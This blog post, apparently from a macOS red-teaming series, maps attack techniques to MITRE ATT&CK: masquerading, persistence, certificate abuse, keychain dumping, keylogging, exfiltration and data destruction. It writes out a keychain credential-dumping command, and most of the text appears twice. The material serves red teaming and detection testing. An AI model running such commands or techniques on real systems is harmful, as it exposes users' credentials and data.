MacOS Red Teaming 208: macOS ATT&CK Techniques
Lets go over some popular macOS ATT&CK techniques. MITRE's ATT&CK has been super popular lately and I would feel remiss if I were to end the series without covering at least one full kill chain, end to end. So let's kill two birds with one stone and use MITRE ATT&CK to guide us through some common / popular macOS red team techniques. The idea here is to review a handful of common techniques and have them ready to go in gscript, giving us options at any stage of the game. This is absolutely not an exhaustive list, that is to say these are well known attacker techniques but there are likely many more being used not in this list currently. Also, if your doing threat emulation remember that these techniques often don't go into enough detail on the procedure. ATT&CK is neither comprehensive nor deep, so try not to rely on any single framework in your threat emulation. I had to remove a few entries from this post because they simply didn't match up to the framework well enough. That said, these are still invaluable for detection testing, or even sourcing ideas for new techniques.
We are going to go from left to right across the general life cycle of the a kill chain. I'm going to skip the initial execution tactic as this is often just the access channel. In my experience on macOS the initial access is initiated via some type of social engineering, either more active/targeted like phishing or more passive like a 'watering hole attack'. This isn't particularly macOS specific content, hence skipping it to save space in this post. So we are going to assume that the user was tricked into downloading the payload somehow and start on execution with that assumption in mind. Let's pick a few macOS specific techniques in a kill chain and cover them in depth.
Space After Filename (T1151)
Execution
This is a pretty unique technique and macOS specific as far as I know. This technique masquerades the true file type by putting a fake extension and then a space at the end. The operating system then interprets the file type, so you can send a file named "terminal.txt " (note the space at the end) that is actually a mach-o executable, and get execution when they go to "open the text file" by double clicking it. Granted, the binary may still be subject to gatekeeper, depending how it was downloaded or how it's signed.
Launchctl Persistence (T152)
Execution / Persistence
This is one of my favorite macOS persistence techniques because of how easy it is to use. Launchctl is what manages all services such as Launch Agents and Launch Daemons, but you can also set it to run one-off commands at login. Here is a helpful gscript to do exactly that. It's a quick one liner and gives you some robust persistence.
Re-Opened Applications (T1164)
Persistence
Literally called "Apple persistence" this default plist controls what applications launch when login window triggers. I've always called this LoginHook persistence as thats the value I set in the plist. Here is a gscript that does this technique using the defaults command.
Plist Modification (T1150)
Defense Evasion / Persistence / PrivEsc
This is one of those "techniques" that are extremely common of both legitimate and malicious applications. I go into plists in more depth in my first os x forensics post. That said, one of the shortcuts I've since adopted is using the defaults command to simply edit values in a plist without reformatting or editing the whole file. But truth be told, it's hard to detect just this technique and is it's usually used in conjunction with another technique, such as a persistence or weakening technique. I have few gscript examples of this, like using the defaults command in gscript to enable the guest user or disable the firewall.
Install Root Certificate (T1130)
Defense Evasion
This is one of those techniques that while it can be performed on most major operating systems, it has a great impact on macOS as it lets subsequent tools easy avoid gatekeeper and look legitimate. You can use the security cli tool to directly add certificates, or you can use profiles. Sometimes these techniques chain together, such as installing a root certificate then using it to code sign your later binaries.
Code Signing (T1116)
Defense Evasion
Another universal technique, one of my first macOS red teaming posts covers code signing indepth as well as the above security certificate adding technique in more depth. I like to sign my compiled gscripts to give them that extra air of authenticity, albeit usually with a throw away self signed certificate. All that said, using a legitimate Apple Code Signing certificate is the best way best Gatekeeper and is highly suggested if you can afford it.
Credential Dumping (T1003)
Credential Access
This is another universal technique, often involving dumping memory and trying to view stored credentials in specific processes or files. Oddly, that page MITRE ATT&CK page dosn't list any macOS specific techniques, despite putting it in the macOS ATT&CK matrix. That said, I talked about dumping memory and finding / cracking the keychain file back in the day.
Keychain (T1142)
Credential Access
This is one of my favorite ways to dump stored credentials on macOS. Even without root level access you can see what credentials re saved, giving you an idea of other systems you could pivot to. Simply use the sudo security -d dump-keychain login.keychain command to dump some creds. You can also export export / extract these files, however you will need a password to decrypt them. That said, modern EDR systems often flag odd applications touching these keychain files.
File and Directory Discovery (T1083)
Discovery
While this is another universal technique, there are actually macOS specific commands here to help speed up the process. One of my favorite tricks is to use the mdfind command line utility which uses already indexed spotlight data. This means you won't be spiking the CPU with a huge grep / search.
System Network Conections Discovery (T1049)
Discovery
The real bread and butter of the Discovery tactic is network reconnaissance. While this is a universal technique, macOS offers a few common utilities for tracking down active network connections, such as w, arp, netstat, and lsof. One of the cool macOS specific commands for viewing network information is dns-sd which leverages BonJour for network service discovery. For example, to view machines with on the network with Remote Apple Events enabled, you can run dns-sd -B _eppc .
AppleScript (T1155)
Execution / Lateral Movement
AppleScript is a very Apple and macOS specific feature, tieing deeply into the Apple Events IPC mechanism. Speaking of Remote Apple Events, taking advantage of this practically for lateral movement one needs to leverage AppleScript. The ATT&CK page again doesn't list any specific macOS procedures, that said I have an entire blog post on getting practical lateral movement out of this service. Granted, like most lateral movement techniques, this requires valid credentials on the remote system.
Key Logger (T1056)
Collection
Another universal technique, however Key Logging is so classic it really can't be avoided. I have a sample gscript here, which really just uses an old key logger. It's simple stuff but it's wildly effective for picking up sensitive information or new credentials.
Command and Control . . .
I'm also skipping Command and Control for now as that will be largely covered in my next post, a deep dive on some of the best macOS RATs or trojans currently. I plan on focusing lesson novel command and control channels, and more on the features offered by the various command and control frameworks. I'm looking forward to it!
Data Compressed (T1002)
Data Encrypted (T1022)
Exfiltration
This is a very classic set of universal techniques, where the attackers will stage, compress, and encrypt some data before exfiltrating it in some manner. I built a cross platform tool around this very set of functions, because as a red teamer you do it so often in so many different contexts. GoRedLoot is that specially designed tool for exactly this purpose. Later I refactored to be used directly from gscript as the gloot library, here's an example gscript using the gloot library.
Data Destruction (T1485)
Impact
Finally, while I don't recommend data destruction in the majority of cases, one can't deny it's impact and recent prevalence. This is another classic, universal technique. So much so, that I made another tool to experiment with the idea of data destruction in a cross platform way. That tool is GoRedDeath, although be careful using it as it is very experimental and destructive.
Now that we've covered some common and interesting macOS specific techniques, let's rapid fire through a few more available macOS ATT&CK gscripts. These come with no description other than the Mitre page and the code itself for brevity. If you have questions or want me to elaborate on a specific technique, feel free to use the comments section:
Backdoor histcontrol (T1148) - gscript
Cron Persistence (T1168) - gscript
Launch Agent Persistence (T1159) - gscript
Launch Daemon Persistence (T1160) - gscript
Trap Persistence (T1154) - gscript
Grab Clipboard (T1115) - gscript
Enabiling SSH (T1021) - gscript
Clear History (T1146) - gscript
Screen Capture (T1113) - gscript
And there are always more techniques on my gscript os x page that don't fit any exact "ATT&CK" technique. If your still looking for even more ideas of red team / pentest techniques for macOS, checkout this presentation, which is chock full of different, real-world techniques:
We are going to go from left to right across the general life cycle of the a kill chain. I'm going to skip the initial execution tactic as this is often just the access channel. In my experience on macOS the initial access is initiated via some type of social engineering, either more active/targeted like phishing or more passive like a 'watering hole attack'. This isn't particularly macOS specific content, hence skipping it to save space in this post. So we are going to assume that the user was tricked into downloading the payload somehow and start on execution with that assumption in mind. Let's pick a few macOS specific techniques in a kill chain and cover them in depth.
Space After Filename (T1151)
Execution
This is a pretty unique technique and macOS specific as far as I know. This technique masquerades the true file type by putting a fake extension and then a space at the end. The operating system then interprets the file type, so you can send a file named "terminal.txt " (note the space at the end) that is actually a mach-o executable, and get execution when they go to "open the text file" by double clicking it. Granted, the binary may still be subject to gatekeeper, depending how it was downloaded or how it's signed.
Launchctl Persistence (T152)
Execution / Persistence
This is one of my favorite macOS persistence techniques because of how easy it is to use. Launchctl is what manages all services such as Launch Agents and Launch Daemons, but you can also set it to run one-off commands at login. Here is a helpful gscript to do exactly that. It's a quick one liner and gives you some robust persistence.
Re-Opened Applications (T1164)
Persistence
Literally called "Apple persistence" this default plist controls what applications launch when login window triggers. I've always called this LoginHook persistence as thats the value I set in the plist. Here is a gscript that does this technique using the defaults command.
Plist Modification (T1150)
Defense Evasion / Persistence / PrivEsc
This is one of those "techniques" that are extremely common of both legitimate and malicious applications. I go into plists in more depth in my first os x forensics post. That said, one of the shortcuts I've since adopted is using the defaults command to simply edit values in a plist without reformatting or editing the whole file. But truth be told, it's hard to detect just this technique and is it's usually used in conjunction with another technique, such as a persistence or weakening technique. I have few gscript examples of this, like using the defaults command in gscript to enable the guest user or disable the firewall.
Install Root Certificate (T1130)
Defense Evasion
This is one of those techniques that while it can be performed on most major operating systems, it has a great impact on macOS as it lets subsequent tools easy avoid gatekeeper and look legitimate. You can use the security cli tool to directly add certificates, or you can use profiles. Sometimes these techniques chain together, such as installing a root certificate then using it to code sign your later binaries.
Code Signing (T1116)
Defense Evasion
Another universal technique, one of my first macOS red teaming posts covers code signing indepth as well as the above security certificate adding technique in more depth. I like to sign my compiled gscripts to give them that extra air of authenticity, albeit usually with a throw away self signed certificate. All that said, using a legitimate Apple Code Signing certificate is the best way best Gatekeeper and is highly suggested if you can afford it.
Credential Dumping (T1003)
Credential Access
This is another universal technique, often involving dumping memory and trying to view stored credentials in specific processes or files. Oddly, that page MITRE ATT&CK page dosn't list any macOS specific techniques, despite putting it in the macOS ATT&CK matrix. That said, I talked about dumping memory and finding / cracking the keychain file back in the day.
Keychain (T1142)
Credential Access
This is one of my favorite ways to dump stored credentials on macOS. Even without root level access you can see what credentials re saved, giving you an idea of other systems you could pivot to. Simply use the sudo security -d dump-keychain login.keychain command to dump some creds. You can also export export / extract these files, however you will need a password to decrypt them. That said, modern EDR systems often flag odd applications touching these keychain files.
File and Directory Discovery (T1083)
Discovery
While this is another universal technique, there are actually macOS specific commands here to help speed up the process. One of my favorite tricks is to use the mdfind command line utility which uses already indexed spotlight data. This means you won't be spiking the CPU with a huge grep / search.
System Network Conections Discovery (T1049)
Discovery
The real bread and butter of the Discovery tactic is network reconnaissance. While this is a universal technique, macOS offers a few common utilities for tracking down active network connections, such as w, arp, netstat, and lsof. One of the cool macOS specific commands for viewing network information is dns-sd which leverages BonJour for network service discovery. For example, to view machines with on the network with Remote Apple Events enabled, you can run dns-sd -B _eppc .
AppleScript (T1155)
Execution / Lateral Movement
AppleScript is a very Apple and macOS specific feature, tieing deeply into the Apple Events IPC mechanism. Speaking of Remote Apple Events, taking advantage of this practically for lateral movement one needs to leverage AppleScript. The ATT&CK page again doesn't list any specific macOS procedures, that said I have an entire blog post on getting practical lateral movement out of this service. Granted, like most lateral movement techniques, this requires valid credentials on the remote system.
Key Logger (T1056)
Collection
Another universal technique, however Key Logging is so classic it really can't be avoided. I have a sample gscript here, which really just uses an old key logger. It's simple stuff but it's wildly effective for picking up sensitive information or new credentials.
Command and Control . . .
I'm also skipping Command and Control for now as that will be largely covered in my next post, a deep dive on some of the best macOS RATs or trojans currently. I plan on focusing lesson novel command and control channels, and more on the features offered by the various command and control frameworks. I'm looking forward to it!
Data Compressed (T1002)
Data Encrypted (T1022)
Exfiltration
This is a very classic set of universal techniques, where the attackers will stage, compress, and encrypt some data before exfiltrating it in some manner. I built a cross platform tool around this very set of functions, because as a red teamer you do it so often in so many different contexts. GoRedLoot is that specially designed tool for exactly this purpose. Later I refactored to be used directly from gscript as the gloot library, here's an example gscript using the gloot library.
Data Destruction (T1485)
Impact
Finally, while I don't recommend data destruction in the majority of cases, one can't deny it's impact and recent prevalence. This is another classic, universal technique. So much so, that I made another tool to experiment with the idea of data destruction in a cross platform way. That tool is GoRedDeath, although be careful using it as it is very experimental and destructive.
Now that we've covered some common and interesting macOS specific techniques, let's rapid fire through a few more available macOS ATT&CK gscripts. These come with no description other than the Mitre page and the code itself for brevity. If you have questions or want me to elaborate on a specific technique, feel free to use the comments section:
Backdoor histcontrol (T1148) - gscript
Cron Persistence (T1168) - gscript
Launch Agent Persistence (T1159) - gscript
Launch Daemon Persistence (T1160) - gscript
Trap Persistence (T1154) - gscript
Grab Clipboard (T1115) - gscript
Enabiling SSH (T1021) - gscript
Clear History (T1146) - gscript
Screen Capture (T1113) - gscript
And there are always more techniques on my gscript os x page that don't fit any exact "ATT&CK" technique. If your still looking for even more ideas of red team / pentest techniques for macOS, checkout this presentation, which is chock full of different, real-world techniques:
